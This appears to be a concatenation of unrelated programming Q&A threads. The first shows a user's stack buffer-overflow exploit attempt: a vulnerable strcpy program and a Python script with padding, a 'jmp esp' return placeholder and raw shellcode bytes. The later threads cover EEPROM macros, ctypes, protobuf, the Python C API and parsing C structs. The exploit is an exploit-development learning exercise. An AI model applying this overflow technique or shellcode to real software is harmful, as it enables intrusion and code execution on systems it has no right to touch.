I am trying to write my own exploit. The idea is simple: overwrite the return address with the address of a 'jmp esp' instruction, since esp holds the address of my shellcode.
So I have this simple program:
#include <stdio.h>
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[100];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
return 0;
}
My exploit is written in Python. Code: (I think my shellcode doesn't work, but that's not important right now.)
import os
import subprocess
out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68\x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'
subprocess.call(['SimpleExploit.exe', out])
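The placeholder address is normally filled in as a little-endian byte string. A minimal sketch of how those four bytes would typically be built (using the example address mentioned later in the question, not a verified 'jmp esp' location):

```python
import struct

# Pack a 32-bit address in little-endian byte order, as the x86
# stack expects it. 0x7769E24D is only the example value from the
# question, not a verified 'jmp esp' gadget.
ret = struct.pack('<I', 0x7769E24D)
```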
If I set the address of the 'jmp esp' opcode to 0x41414141 ('AAAA'), everything is OK (of course 0x41414141 is not a valid address, but I can see that the memory has been overwritten).
My problem starts when I put in the correct address. I found 0x7769E24D, so I used this value, and afterwards in OllyDbg I saw:
And this is my question: why does the memory look different? It looks as if one line has been removed. But why? The interesting thing is that if I change only one byte (0x77 to 0x41), the memory is overwritten with the correct values.
The second problem is that some of my bytes are transformed into different values, for example 0x8b to 0x3f.
Could somebody tell me why this happens? Maybe it is some kind of protection? Is it something to do with my operating system? I use Windows 8.1 x64.
I'm trying to rewrite some C code in Python, but I'm not sure how to express this part in Python:
#include <EEPROM.h>
#define EEPROM_write(address, p) {int i = 0; byte *pp = (byte*)&(p);for(; i < sizeof(p); i++) EEPROM.write(address+i, pp[i]);}
I think I should use the I2C object from the machine module, but I'm not sure what is going on in the C version.
Let's dissect the macro line:
#define
This is the preprocessor command to define a macro.
EEPROM_write(address, p)
The macro is named "EEPROM_write" and it takes two arguments, "address" and "p". Since the preprocessor is mostly working here as a search-and-replace mechanism, there are no types. They depend on the site where the macro is used.
{
int i = 0;
byte *pp = (byte*)&(p);
for (; i < sizeof(p); i++)
EEPROM.write(address+i, pp[i]);
}
This is the formatted C code of the replacement. It consists of a single block of statements, and the preprocessor will replace each occurrence of address and p with the arguments given at the usage site of the macro.
The code block takes the address of p as a byte pointer. Then it loops through all bytes of p (including padding) and calls EEPROM.write() with consecutive addresses (starting at address) and the respective byte of p.
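To mirror this in Python, one approach is to serialize the value with the struct module and write the resulting bytes one at a time. This is only a sketch: the FakeEEPROM class is a stand-in for whatever driver object you actually have (e.g. something built on the machine module's I2C), and the format string replaces C's sizeof, since Python objects have no fixed byte size:

```python
import struct

def eeprom_write(eeprom, address, value, fmt):
    # Serialize the value to its raw bytes (the Python analogue of
    # (byte*)&p in the macro), then write them to consecutive addresses.
    raw = struct.pack(fmt, value)
    for i, b in enumerate(raw):
        eeprom.write(address + i, b)

# Stand-in for a real driver, only to show the call pattern.
class FakeEEPROM:
    def __init__(self):
        self.mem = {}
    def write(self, addr, byte):
        self.mem[addr] = byte

e = FakeEEPROM()
eeprom_write(e, 0, 1000, "<h")  # a 16-bit little-endian int
```

Note that unlike the C macro, the caller has to state the type explicitly via the format string ("<h" here), because Python cannot infer the on-wire size of a value.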
I have a unicode string f. I want to memset it to 0, so that print f displays null (\0) characters.
I am using ctypes.memset to achieve this -
>>> f
u'abc'
>>> print ("%s" % type(f))
<type 'unicode'>
>>> import ctypes
>>> ctypes.memset(id(f)+50,0,6)
4363962530
>>> f
u'abc'
>>> print f
abc
Why did the memory location not get memset in case of unicode string?
It works perfectly for an str object.
Thanks for help.
First, this is almost certainly a very bad idea. Python expects strings to be immutable. There's a reason that even the C API won't let you change their contents after they're flagged ready. If you're just doing this to play around with the interpreter's implementation, that can be fun and instructive, but if you're doing it for any real-life purpose, you're probably doing something wrong.
In particular, if you're doing it for "security", what you almost certainly really want to do is to not create a unicode in the first place, but instead create, say, a bytearray with the UTF-16 or UTF-32 encoding of your string, which can be zeroed out in a way that's safe, portable, and a lot easier.
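A minimal sketch of that bytearray approach (the UTF-16-LE encoding is an arbitrary choice here):

```python
# Keep the secret in a mutable bytearray instead of an immutable string.
secret = bytearray(u"abc".encode("utf-16-le"))

# ... use the secret ...

# Zero it in place when finished; no interpreter internals involved.
for i in range(len(secret)):
    secret[i] = 0
```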
Anyway, there's no reason to expect that two completely different types should store their buffers at the same offset.
In CPython 2.x, a str is a PyStringObject:
typedef struct {
PyObject_VAR_HEAD
long ob_shash;
int ob_sstate;
char ob_sval[1];
} PyStringObject;
That ob_sval is the buffer; the offset should be 36 on 64-bit builds and (I think) 24 on 32-bit builds.
In a comment, you say:
I read it somewhere, and also the offset for a string type is 37 on my system, which is what sys.getsizeof('') shows:
>>> sys.getsizeof('')
37
The offset for a string buffer is actually 36, not 37. And the fact that it's even that close is just a coincidence of the way str is implemented. (Hopefully you can understand why by looking at the struct definition—if not, you definitely shouldn't be writing code like this.) There's no reason to expect the same trick to work for some other type without looking at its implementation.
A unicode is a PyUnicodeObject:
typedef struct {
PyObject_HEAD
Py_ssize_t length; /* Length of raw Unicode data in buffer */
Py_UNICODE *str; /* Raw Unicode buffer */
long hash; /* Hash value; -1 if not set */
PyObject *defenc; /* (Default) Encoded version as Python
string, or NULL; this is used for
implementing the buffer protocol */
} PyUnicodeObject;
Its buffer is not even inside the object itself; that str member is a pointer to the buffer (which is not guaranteed to be right after the struct). Its offset should be 24 on 64-bit builds, and (I think) 20 on 32-bit builds. So, to do the equivalent, you'd need to read the pointer there, then follow it to find the location to memset.
If you're using a narrow-Unicode build, it should look like this:
>>> ctypes.POINTER(ctypes.c_uint16 * len(g)).from_address(id(g)+24).contents[:]
[97, 98, 99]
That's the ctypes translation of finding (uint16_t *)(((char *)g)+24) and reading the array that starts at *that and ends at *(that+len(g)), which is what you'd have to do if you were writing C code and didn't have access to the unicodeobject.h header.
(In the test I just quoted, g is at 0x10a598090, while its str member points to 0x10a3b09e0, so the buffer is not immediately after the struct, or anywhere near it; it's about 2MB before it.)
For a wide-Unicode build, the same thing with c_uint32.
So, that should show you what you want to memset.
And you should also see a serious implication for your attempt at "security" here. (If I have to point it out, that's yet another indication that you should not be writing this code.)
Hi, I have a simple addressbook.proto example that I am serializing using the protobuf SerializeToString() function in Python. Here's the code.
import address_pb2
person = address_pb2.Person()
person.id = 1234
person.name = "John Doe"
person.email = "jdoe#example.com"
phone = person.phones.add()
phone.number = "555-4321"
phone.type = address_pb2.Person.HOME
print(person.SerializeToString())
Here address_pb2 is the file I generated with the protobuf compiler. Note that the example is copied from the protobuf tutorials. This gives me the following string.
b'\n\x08John Doe\x10\xd2\t\x1a\x10jdoe#example.com"\x0c\n\x08555-4321\x10\x01'
Now I want to import this string into C++ protobuf. For this I wrote the following code.
#include <iostream>
#include <fstream>
#include <string>
#include "address.pb.h"
using namespace std;
int main(int argc, char* argv[]) {
GOOGLE_PROTOBUF_VERIFY_VERSION;
tutorial::AddressBook address_book;
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
if(address_book.ParseFromString(data)){
cout<<"working"<< endl;
}
else{
cout<<"not working" << endl;
}
// Optional: Delete all global objects allocated by libprotobuf.
google::protobuf::ShutdownProtobufLibrary();
return 0;
}
Here I am simply trying to parse the string using the ParseFromString() function, but this doesn't work, and I am not sure how to make it work, as I've been stuck on this for a long time now.
I tried changing the binary a bit to suit the c++ version but still no idea if I am on the right path or not.
How can I achieve this? Does anybody have a clue?
In Python, you are serializing a Person object. In C++, you are trying to parse an AddressBook object. You need to use the same type on both ends.
(Note that protobuf does NOT guarantee that it will detect these errors. Sometimes when you parse a message as the wrong type, the parse will appear to succeed, but the content will be garbage.)
There's another issue with your code that happens not to be a problem in this specific case, but wouldn't work in general:
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
This line won't work if the string has any NUL bytes, i.e. '\x00'. If so, that byte would be interpreted as the end of the string. To avoid this problem you need to specify the length of the data, like:
string data("\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""", 45);
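If hand-copying the escaped bytes into a C++ string literal keeps causing trouble, an alternative worth considering (a sketch, assuming both programs can share a file) is to write the raw serialized bytes to a file from Python and read the whole file into a std::string on the C++ side:

```python
# The exact bytes printed by SerializeToString() in the question.
data = b'\n\x08John Doe\x10\xd2\t\x1a\x10jdoe#example.com"\x0c\n\x08555-4321\x10\x01'

# Write the raw bytes to a file; nothing is escaped or truncated,
# and embedded NUL bytes survive intact.
with open("person.bin", "wb") as fh:
    fh.write(data)
```

The C++ side can then read the file in binary mode into a std::string and pass that to ParseFromString() on the matching message type, which sidesteps both the escaping and the NUL-byte pitfalls of string literals.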
I am extending Python with some C++ code.
One of the functions I'm using has the following signature:
int PyArg_ParseTupleAndKeywords(PyObject *arg, PyObject *kwdict,
char *format, char **kwlist, ...);
(link: http://docs.python.org/release/1.5.2p2/ext/parseTupleAndKeywords.html)
The parameter of interest is kwlist. In the link above, examples on how to use this function are given. In the examples, kwlist looks like:
static char *kwlist[] = {"voltage", "state", "action", "type", NULL};
When I compile this using g++, I get the warning:
warning: deprecated conversion from string constant to ‘char*’
So, I can change the static char* to a static const char*. Unfortunately, I can't change the Python code. So with this change, I get a different compilation error (can't convert char** to const char**). Based on what I've read here, I can turn on compiler flags to ignore the warning or I can cast each of the constant strings in the definition of kwlist to char *. Currently, I'm doing the latter. What are other solutions?
Sorry if this question has been asked before. I'm new.
Does PyArg_ParseTupleAndKeywords() expect to modify the data you are passing in? Normally, in idiomatic C++, a const <something> * points to an object that the callee will only read from, whereas <something> * points to an object that the callee can write to.
If PyArg_ParseTupleAndKeywords() expects to be able to write to the char * you are passing in, you've got an entirely different problem over and above what you mention in your question.
Assuming that PyArg_ParseTupleAndKeywords does not want to modify its parameters, the idiomatically correct way of dealing with this problem would be to declare kwlist as const char *kwlist[] and use const_cast to remove its const-ness when calling PyArg_ParseTupleAndKeywords() which would make it look like this:
PyArg_ParseTupleAndKeywords(..., ..., ..., const_cast<char **>(kwlist), ...);
There is an accepted answer from seven years ago, but I'd like to add an alternative solution, since this topic seems to be still relevant.
If you don't like the const_cast solution, you can also create a write-able version of the string array.
char s_voltage[] = "voltage";
char s_state[] = "state";
char s_action[] = "action";
char s_type[] = "type";
char *kwlist[] = {s_voltage, s_state, s_action, s_type, NULL};
The char name[] = "..." definition copies the string into a writable location.
I often have to write code in other languages that interact with C structs. Most typically this involves writing Python code with the struct or ctypes modules.
So I'll have a .h file full of struct definitions, and I have to manually read through them and duplicate those definitions in my Python code. This is time consuming and error-prone, and it's difficult to keep the two definitions in sync when they change frequently.
Is there some tool or library in any language (doesn't have to be C or Python) which can take a .h file and produce a structured list of its structs and their fields? I'd love to be able to write a script to automatically generate my struct definitions in Python, and I don't want to have to process arbitrary C code to do it. Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
If you compile your C code with debugging (-g), pahole (git) can give you the exact structure layouts being used.
$ pahole /bin/dd
…
struct option {
const char * name; /* 0 8 */
int has_arg; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
int * flag; /* 16 8 */
int val; /* 24 4 */
/* size: 32, cachelines: 1, members: 4 */
/* sum members: 24, holes: 1, sum holes: 4 */
/* padding: 4 */
/* last cacheline: 32 bytes */
};
…
This should be quite a lot nicer to parse than straight C.
Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
The headaches happen in the cases where the C code contains syntax that you didn't think of when writing your regular expressions. Then you go back and realise that C can't really be parsed by regular expressions, and life becomes not fun.
Try turning it around: define your own simple format, which allows less tricks than C does, and generate both the C header file and the Python interface code from your file:
define socketopts
int16 port
int32 ipv4address
int32 flags
Then you can easily write some Python to convert this to:
typedef struct {
short port;
int ipv4address;
int flags;
} socketopts;
and also to emit a Python class which uses struct to pack/unpack three values (possibly two of them big-endian and the other native-endian, up to you).
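A minimal sketch of such a generator (the two-column field syntax and the type names are taken from the example above; everything else, including the helper names, is an assumption):

```python
import struct

# Map the custom field types to C types and struct-module format codes.
TYPES = {"int16": ("short", "h"), "int32": ("int", "i")}

def parse(defn):
    # First line: "define <name>"; remaining lines: "<type> <field>".
    lines = [ln.split() for ln in defn.strip().splitlines()]
    assert lines[0][0] == "define"
    name = lines[0][1]
    fields = [(t, n) for t, n in lines[1:]]
    return name, fields

def to_c(name, fields):
    # Emit the typedef'd C struct.
    body = "\n".join("    %s %s;" % (TYPES[t][0], n) for t, n in fields)
    return "typedef struct {\n%s\n} %s;" % (body, name)

def to_fmt(fields):
    # Emit the struct-module format string for the same layout.
    return "".join(TYPES[t][1] for t, _ in fields)

name, fields = parse("""
define socketopts
int16 port
int32 ipv4address
int32 flags
""")
print(to_c(name, fields))
# '<' forces little-endian, standard sizes, no padding.
packed = struct.pack("<" + to_fmt(fields), 80, 0, 1)
```

Note the endianness choice: with the '<' prefix the Python side uses standard sizes and no padding, so the C side must either use packed structs or the generator must model padding explicitly.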
Have a look at SWIG or SIP, which would generate the interface code for you, or use ctypes.
Have you looked at Swig?
I have quite successfully used GCCXML on fairly large projects. You get an XML representation of the C code (including structures) which you can post-process with some simple Python.
ctypes-codegen or ctypeslib (same thing, I think) will generate ctypes Structure definitions (also other things, I believe, but I only tried structs) by parsing header files using GCCXML. It's no longer supported, but will likely work in some cases.
A friend of mine wrote a C parser for this task, which he uses with cog.